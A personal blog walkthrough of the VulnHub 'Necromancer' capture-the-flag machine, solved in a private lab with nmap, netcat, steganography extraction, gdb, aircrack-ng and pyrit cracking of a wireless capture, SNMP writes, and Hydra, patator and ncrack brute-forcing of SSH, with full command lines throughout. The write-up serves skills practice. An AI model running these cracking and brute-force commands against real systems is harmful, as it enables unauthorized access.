CTF – Hacking Necromancer

Capture The Flag – Necromancer. Practicing my penetration testing skills to hack a target machine.  Here’s my test environment in my own private virtual network.

I setup my Kali Linux in host virtual network and my target machine (Necromancer) which I downloaded a OVA image from VulnHub website.

When I started my Kali Linux virtual machine, I have an assigned IP Address This most likely a different IP address when you setup your own private network. And my target machine Necromancer IP address is I saw this when I started the Necromancer virtual machine. This save me some time to scan all /24 within my network.

Anyway, if you still want to scan your network you can use “netdiscover” tool. If you’re not sure what options to use simply run “netdiscover –help”. Okay, got it? Now run # netdiscover -r [Enter] to scan your private network. Here’s the result of my network. I run “ifconfig” in my Kali to know the assigned IP address, then the other IP most likely for my target network. 00:50:56:c0:00:01 1 60 VMware, Inc. 00:0c:29:a5:8c:67 1 60 VMware, Inc. 00:50:56:f0:0a:96 1 60 VMware, Inc.

With this information I can simply run nmap to my target IP address.


Note: IP Address renewal in 900 seconds.

Now my private network, Kali and target machine are ready. Let’s begin hacking my target machine.

From Kali Linux virtual machine run # nmap to see what I can discover.


I found port 80 open and 1 host up. That’s a good start. Let’s run # nmap -sU -n -r -T4


Now it’s getting interesting. I found UDP port 666 a service for doom.

Let’s fire up netcat using the newly discovered UDP port 666 # nc 666 [Enter].


Hmm. Nothing happen. I wonder what’s going on in the background. One way to find out, let’s run our network snipping tool wireshark. I filter the result using my target machine IP Address and found out it is trying to connect to the destination port 4444.


I open another terminal window, and setup to listen using port 4444 # nc -lvp 4444 [Enter]. And re-run # nc -u 666 [Enter], then wait to see the output in listening terminal window.

This is the result.


My first guess, it is a base64 code. I copied the code to my dumptext.txt file. And run #base64 -d -i dumptext.txt [Enter]

Woohh. I got the first flag.


I copied  flag1{e6078b9b1aac915d11b9fd59791030bf}  to my flags.txt file for recording purpose, just like a trophy 🙂

Looks like flag1{e6078b9b1aac915d11b9fd59791030bf}  is a MD5 hash. Searching google for “MD5 decrypt”. Visit a website to decrypt it.


I’ve got “opensesame”. Now let’s run this command. # echo opensesame | nc -u 666

After running the command, it reveal our flag2{c39cd4df8f2e35d20d92c2e44de5f7c6}.


I got another port 80, and notice port 666 is closed. I verified it by running # nmap -sU -n -r -T4 Yes, it is confirmed port 666 is not there anymore.


Open a Firefox, and enter URL, no need to enter port 80. I got the website with a bird image.


Reading the text, doesn’t give any hint for my next move except with the obvious bird image. Let me download this image and see what I can dig up. I saved it as “pileoffeathers.jpg” to my necromancer folder.

Let’s examine the “pileoffeathers.jpg” file. Run #file pileoffeathers.jpg to see what it is, then #exif pileoffeathers.jpg. We have no value of color space, that’s interesting.


Next thing to do is run hexeditor to see what’s in the jpg file # hexeditor pileoffeathers.jpg


Look what I found? A file name feathers.txt within the pileoffeathers.jpg hidden, not anymore 🙂


Running #binwalk pileoffeathers.jpg confirmed there is zip archive data.

Let’s run # unzip pileoffeathers.jpg maybe it will produce this feathers.txt file.


Viola feathers.txt is available for me to read.

root@kali:~/necromancer# cat feathers.txt

Hmm. Another base64 coded file. No problem, let’s run it.

root@kali:~/necromancer# base64 -d -i feathers.txt
flag3{9ad3f62db7b91c28b68137000394639f} – Cross the chasm at /amagicbridgeappearsatthechasm

The feathers.txt file revealed flag3{9ad3f62db7b91c28b68137000394639f}. We are getting lucky here and another sub-folder /amagicbridgeappearsatthechasm

Let’s visit the website shows more text and an image.


“There must be a magical item that could protect you from the necromancer’s spell.” Is this a hint? I don’t know.

Tried the same approach from the pileoffeathers.jpg file.

root@kali:~/necromancer# file magicbook.jpg
magicbook.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1×1, segment length 16, baseline, precision 8, 600×450, frames 3
root@kali:~/necromancer# exif magicbook.jpg
Corrupt data
The data provided does not follow the specification.
ExifLoader: The data supplied does not seem to contain EXIF data.
root@kali:~/necromancer# unzip magicbook.jpg
Archive: magicbook.jpg
End-of-central-directory signature not found. Either this file is not
a zipfile, or it constitutes one disk of a multi-part archive. In the
latter case the central directory and zipfile comment will be found on
the last disk(s) of this archive.
unzip: cannot find zipfile directory in one of magicbook.jpg or, and cannot find magicbook.jpg.ZIP, period.

No luck! Not looking good.

Going back to the last webpage  maybe  running a dirbuster tool will assist me uncovering the hidden magic 🙂

root@kali:~/necromancer# dirb /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt

DIRB v2.22
By The Dark Raver

START_TIME: Tue Nov 29 14:50:41 2016
WORDLIST_FILES: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt


*** Generating Wordlist… (this is my queue to take a quick break)

—- Scanning URL: —-
+ (CODE:200|SIZE:9676)

END_TIME: Tue Nov 29 15:02:28 2016

After few minutes, I got lucky the result came up and found talisman

Go to Firefox and visit the new URL we just found, then prompted to save it. Saved the file as talisman

Note: In Firefox, the download file will be save in Download folder.

I have to copy the downloaded talisman file to my working folder.

root@kali:~/necromancer# cp ~/Downloads/talisman ./

root@kali:~/necromancer# ls
dumptext.txt feathers.txt magicbook.jpg talisman
feathers.cp.txt flags.txt pileoffeathers.jpg

Let’s check the talisman file.

root@kali:~/necromancer# file talisman
talisman: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/, for GNU/Linux 2.6.32, BuildID[sha1]=2b131df906087adf163f8cba1967b3d2766e639d, not stripped

It’s a bummer, the talisman file is 32-bit executable. I’m running Kali in 64bit :(. It this the end for me? Nope…

root@kali:~/necromancer# binwalk talisman

0 0x0 ELF, 32-bit LSB executable, Intel 80386, version 1 (SYSV)

Nothing to find here …

root@kali:~/necromancer# ls -al
total 232
drwxr-xr-x 2 root root 4096 Nov 29 15:19 .
drwxr-xr-x 17 root root 4096 Nov 29 12:57 ..
-rw-r–r– 1 root root 1423 Nov 29 11:47 dumptext.txt
-rw-r–r– 1 root root 125 Nov 29 11:47 feathers.cp.txt
-rw-r–r– 1 root root 125 May 9 2016 feathers.txt
-rw-r–r– 1 root root 183 Nov 29 11:05 flags.txt
-rw-r–r– 1 root root 158080 Nov 29 14:41 magicbook.jpg
-rw-r–r– 1 root root 37289 Nov 29 11:01 pileoffeathers.jpg
-rw-r–r– 1 root root 9676 Nov 29 15:19 talisman
root@kali:~/necromancer# chmod +x talisman
root@kali:~/necromancer# ./talisman
bash: ./talisman: No such file or directory        <– Duh!

First, I need to install the 32bit architecture of Kali so I can execute this file. Time to google on how to install the 32 bit package for Kali so I can execute talisman file.

Took forever … to figure this out. I setup my Kali virtual machine in a host private network. I have no access to the internet for this isolated network for hacking my test environment. So I have to reboot my Kali virtual machine and configure to NAT so I can connect to the Internet and run the following command  for the architecture i386.

dpkg –add-architecture i386
apt-get update
apt-get install ia32-libs

NOTE: I should run another Kali virtual machine in 32bit so I don’t have to deal with this add-infrastructure i386 update.

Break time, time to get a sandwich.

Not helping at this time. I run another Kali virtual machine in 32bit so I can execute the”talisman” file.

root@kali:~/KING.NET/necromancer# chmod +x talisman
root@kali:~/KING.NET/necromancer# ls -al
total 72
drwxr-xr-x 2 root root 4096 Nov 29 22:30 .
drwxr-xr-x 3 root root 4096 Nov 29 22:09 ..
-rw-r–r– 1 root root 1423 Nov 29 22:10 dumptext.txt
-rw-r–r– 1 root root 125 May 9 2016 feathers.txt
-rw-r–r– 1 root root 202 Nov 29 22:16 flags.txt
-rw-r–r– 1 root root 37289 Nov 29 22:15 pileoffeathers.jpg
-rwxr-xr-x 1 root root 9676 Nov 29 22:30 talisman

Then execute ./talisman file to see what will happen next.

root@kali:~/KING.NET/necromancer# ./talisman
You have found a talisman.

The talisman is cold to the touch, and has no words or symbols on it’s surface.

Do you want to wear the talisman? y

Nothing happens.

Let me run GNU Debugger.

root@kali:~/necromancer# gdb talisman
GNU gdb (Debian 7.11.1-2+b1) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <;
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type “show copying”
and “show warranty” for details.
This GDB was configured as “x86_64-linux-gnu”.
Type “show configuration” for configuration details.
For bug reporting instructions, please see:
Find the GDB manual and other documentation resources online at:
For help, type “help”.
Type “apropos word” to search for commands related to “word”…
Reading symbols from talisman…(no debugging symbols found)…done.
(gdb) info functions [Enter]
All defined functions:

Non-debugging symbols:
0x080482d0 _init
0x08048310 printf@plt
0x08048320 __libc_start_main@plt
0x08048330 __isoc99_scanf@plt
0x08048350 _start
0x08048380 __x86.get_pc_thunk.bx
0x08048390 deregister_tm_clones
0x080483c0 register_tm_clones
0x08048400 __do_global_dtors_aux
0x08048420 frame_dummy
0x0804844b unhide
0x0804849d hide
0x080484f4 myPrintf
0x08048529 wearTalisman
0x08048a13 main
0x08048a37 chantToBreakSpell
0x08049530 __libc_csu_init
0x08049590 __libc_csu_fini
0x08049594 _fini

(gdb) break wearTalisman
Breakpoint 1 at 0x804852d
(gdb) run
Starting program: /root/KING.NET/necromancer/talisman

Breakpoint 1, 0x0804852d in wearTalisman ()
(gdb) jump chantToBreakSpell
Continuing at 0x8048a3b.
You fall to your knees.. weak and weary.
Looking up you can see the spell is still protecting the cave entrance.
The talisman is now almost too hot to touch!
Turning it over you see words now etched into the surface:
Chant these words at u31337
[Inferior 1 (process 2728) exited normally]

I got flag4 and new hint udp port 31337, that’s a long task to finish. Moving on …

I used again the MD5 Decrypter website to decode flag4 code and came up this value “blackmagic

root@kali:~/KING.NET/necromancer# echo blackmagic | nc -u 31337

As you chant the words, a hissing sound echoes from the ice walls.

The blue aura disappears from the cave entrance.

You enter the cave and see that it is dimly lit by torches; shadows dancing against the rock wall as you descend deeper and deeper into the mountain.

You hear high pitched screeches coming from within the cave, and you start to feel a gentle breeze.

The screeches are getting closer, and with it the breeze begins to turn into an ice cold wind.

Suddenly, you are attacked by a swarm of bats!

You aimlessly thrash at the air in front of you!

The bats continue their relentless attack, until…. silence.

Looking around you see no sign of any bats, and no indication of the struggle which had just occurred.

Looking towards one of the torches, you see something on the cave wall.

You walk closer, and notice a pile of mutilated bats lying on the cave floor. Above them, a word etched in blood on the wall.



Looking good, I got flag5 and another hint.

Using the new hint, let’s go visit this page

This page gave me the flag6{b1c3ed8f1db4258e4dcb0ce565f6dc03}
code. Easy. At the end of the page, another hint maybe “Looking closer at the skull, you can see u161 engraved into the forehead.“. This is UDP port 161 for SNMP. I don’t know yet, if this will be useful later on.

I downloaded the link filename “necromancer” and also the image “necromancer.jpg” file.

Using binwalk to investigate the “necromancer” file.

root@kali:~/KING.NET/necromancer# binwalk necromancer

0 0x0 bzip2 compressed data, block size = 900k

The “necromancer” is a bzip2 file. Let’s unzip this file. Again, if you need help simply run “bzip2 –help” and it will provide you all available options. I will use -d option to decompress the file.

root@kali:~/KING.NET/necromancer# bzip2 -d necromancer
bzip2: Can’t guess original name for necromancer — using necromancer.out

-rw-r–r– 1 root root 81920 Nov 29 23:42 necromancer.out

Let’s find out about the new file “necromancer.out”. Run binwalk against this file to know more about it.

root@kali:~/KING.NET/necromancer# binwalk necromancer.out

0 0x0 POSIX tar archive (GNU), owner user name: “cer.cap”

So, the “necromancer.out” is a tar archive. Let’s decompress this file.

root@kali:~/KING.NET/necromancer# tar -xf necromancer.out [Enter]. It produce another file “necromancer.cap”. I can read .cap extension using wireshark tool to see what’s in it.

-rw-r–r– 1 root root 80242 May 10 2016 necromancer.cap

When I open “necromancer.cap” using wireshark. I know right away, it is a traffic for wireless traffic. See captured image below.


I can crack this file using Aircrack-ng wireless cracking tool and the rockyou.txt to discover the secret key. First, I need to unzip the rockyou.txt.gz so I can use it.

root@kali:/usr/share/wordlists# gzip -d rockyou.txt.gz
root@kali:/usr/share/wordlists# ls -al rockyou.txt
-rw-r–r– 1 root root 139921507 Mar 3 2013 rockyou.txt

And the file is ready to use. Let’s try aircrack-ng tool to get more information about the necromancer.cap file.

root@kali:~/KING.NET/necromancer# aircrack-ng necromancer.cap -w /usr/share/wordlists/rockyou.txt

The key is “death2all” is revealed.

I can also use another tool “pyrit” to produce the same results. It’s nice to know other alternative cracking tools.

root@kali:~/KING.NET/necromancer# pyrit -r necromancer.cap -i /usr/share/wordlists/rockyou.txt attack_passthrough
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg
This code is distributed under the GNU General Public License v3+

Parsing file ‘necromancer.cap’ (1/1)…
Parsed 6 packets (6 802.11-packets), got 1 AP(s)

Picked AccessPoint c4:12:f5:0d:5e:95 (‘community‘) automatically.
Tried 40002 PMKs so far; 944 PMKs per second.

The password is ‘death2all‘.

Between the aircrack-ng and pyrit cracking tools, I prefer to use aircrack-ng since I used this tool in the past, during my wardriving competition at BlackHat.

Ok, what to do with newly discovered password? Remember, we have another hint using port 161 for SNMP. I think snmpwalk will help un-cover more data.

root@kali:~/KING.NET/necromancer# snmpwalk -c death2all -v1
Created directory: /var/lib/snmp/mib_indexes
iso. = STRING: “You stand in front of a door.”
iso. = STRING: “The door is Locked. If you choose to defeat me, the door must be Unlocked.”
iso. = STRING: “Fear the Necromancer!”
iso. = STRING: “Locked – death2allrw!
End of MIB

I don’t remember on how to change the SNMP string, so google search to the rescue. I found interesting video tutorial courtesy by Keks-IT.

root@kali:~/KING.NET/necromancer# snmpset -c death2allrw -v1 iso. s Unlocked
iso. = STRING: “Unlocked”

Then, re-run root@kali:~/KING.NET/necromancer# snmpwalk -c death2all -v1

Viola! Flag7 is revealed with our new TCP port 22 for SSH.

root@kali:~/KING.NET/necromancer# snmpwalk -c death2all -v1
iso. = STRING: “You stand in front of a door.”
iso. = STRING: “The door is unlocked! You may now enter the Necromancer’s lair!”
iso. = STRING: “Fear the Necromancer!”
iso. = STRING: “flag7{9e5494108d10bbd5f9e7ae52239546c4} – t22″
End of MIB

To access SSH server, I need a username and password to enter. Maybe my flag7 is a username. Let’s use hashkiller website to decrypte flag7 value, and the result is”demonslayer“.


I’m assuming this my ssh username. I tried to login using demonslayer as username and password, but no luck.

Let’s start password cracking. Tools to use can be John, Hydra, Potator ncrack or Medusa. Let’s use Hydra for example.


Password cracked in under 1 minute.

Alternative password cracking tools.

root@kali:~/KING.NET/necromancer# patator ssh_login host= port=22 user=demonslayer password=FILE0 0=rockyou.txt -x ignore:mesg=’Authentication failed.’

root@kali:~/KING.NET/necromancer# ncrack -p 22 –user demonslayer -v -P /usr/share/wordlists/rockyou.txt -f

All produce the same results.

Now, let’s use our discovered username “demonslayer” and password “12345678” to connect via SSH (port 22).

root@kali:~/KING.NET/necromancer# ssh demonslayer@
The authenticity of host ‘ (’ can’t be established.
ECDSA key fingerprint is SHA256:sIaywVX5Ba0Qbo/sFM3Gf9cY9SMJpHk2oTZmOHKTtLU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added ‘’ (ECDSA) to the list of known hosts.
demonslayer@’s password:


List the directory and we got flag8.txt

$ ls
$ cat flag8.txt
You enter the Necromancer’s Lair!

A stench of decay fills this place.

Jars filled with parts of creatures litter the bookshelves.

A fire with flames of green burns coldly in the distance.

Standing in the middle of the room with his back to you is the Necromancer.

In front of him lies a corpse, indistinguishable from any living creature you have seen before.

He holds a staff in one hand, and the flickering object in the other.

“You are a fool to follow me here! Do you not know who I am!”

The necromancer turns to face you. Dark words fill the air!

“You are damned already my friend. Now prepare for your own death!”

Defend yourself! Counter attack the Necromancer’s spells at u777!

I don’t see my flag8 in this text, though a hint of UDP port 777

$ nc -u localhost 777

** You only have 3 hitpoints left! **

Google search is your best source to get the answer. 

** You only have 3 hitpoints left! **

Defend yourself from the Necromancer’s Spells!

Where do the Black Robes practice magic of the Greater Path? Kelewan

** You only have 3 hitpoints left! **

Defend yourself from the Necromancer’s Spells!

Who did Johann Faust VIII make a deal with? Mephistopheles


** You only have 3 hitpoints left! **

Defend yourself from the Necromancer’s Spells!

Who is tricked into passing the Ninth Gate? Hedge


A great flash of light knocks you to the ground; momentarily blinding you!

As your sight begins to return, you can see a thick black cloud of smoke lingering where the Necromancer once stood.

An evil laugh echoes in the room and the black cloud begins to disappear into the cracks in the floor.

The room is silent.

You walk over to where the Necromancer once stood.

On the ground is a small vile.

$ ls -al
total 44
drwxr-xr-x 3 demonslayer demonslayer 512 Nov 30 12:01 .
drwxr-xr-x 3 root wheel 512 May 11 2016 ..
-rw-r–r– 1 demonslayer demonslayer 87 May 11 2016 .Xdefaults
-rw-r–r– 1 demonslayer demonslayer 773 May 11 2016 .cshrc
-rw-r–r– 1 demonslayer demonslayer 103 May 11 2016 .cvsrc
-rw-r–r– 1 demonslayer demonslayer 359 May 11 2016 .login
-rw-r–r– 1 demonslayer demonslayer 175 May 11 2016 .mailrc
-rw-r–r– 1 demonslayer demonslayer 218 May 11 2016 .profile
-rw-r–r– 1 demonslayer demonslayer 196 Nov 30 12:00 .smallvile
drwx—— 2 demonslayer demonslayer 512 May 11 2016 .ssh
-rw-r–r– 1 demonslayer demonslayer 706 May 11 2016 flag8.txt

$ cat .smallvile
You pick up the small vile.

Inside of it you can see a green liquid.

Opening the vile releases a pleasant odour into the air.

You drink the elixir and feel a great power within your veins!

$ id
uid=1000(demonslayer) gid=1000(demonslayer) groups=1000(demonslayer)

$ sudo -l
Matching Defaults entries for demonslayer on thenecromancer:

User demonslayer may run the following commands on thenecromancer:
(ALL) NOPASSWD: /bin/cat /root/flag11.txt

$ sudo /bin/cat /root/flag11.txt


All the flags.

root@kali:~/KING.NET/necromancer# cat flags.txt
flag3{9ad3f62db7b91c28b68137000394639f} – Cross the chasm at /amagicbridgeappearsatthechasm

I’m still honing my penetration testing skills, will continue to learn from other smart hackers out there. I’m catching up …


Useful links:



Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s